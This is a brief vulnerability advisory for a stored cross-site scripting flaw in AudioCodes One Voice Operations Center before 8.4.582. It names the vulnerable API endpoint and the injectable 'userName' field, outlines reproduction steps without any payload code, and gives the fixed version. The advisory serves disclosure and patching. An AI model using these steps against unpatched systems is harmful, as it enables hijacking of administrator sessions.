AudioCodes One Voice Operations Center Cross-Site Scripting Vulnerability

A cross-site scripting (XSS) vulnerability has been identified in AudioCodes One Voice Operations Center (OVOC) versions prior to 8.4.582. The issue arises from improper input sanitization via the devices' API, allowing attackers to inject malicious JavaScript that targets logged-in administrator sessions. This vulnerability can be exploited by sending an 'Init' request to the API, where the injected script is executed when the devices' manager landing page is accessed.

Impact

Exploitation of this vulnerability allows for cross-site scripting, where injected scripts are executed in the context of the user's session.

Reproduction

To reproduce this vulnerability, send a POST request to the '/rest/v1/ipphoneMgrStatus/init' endpoint via the devices' API. Include unsanitized JavaScript in the 'userName' field. After injecting the script, visit the device manager landing page to execute the injected JavaScript.

Remediation

Users are advised to update to AudioCodes One Voice Operations Center version 8.4.582.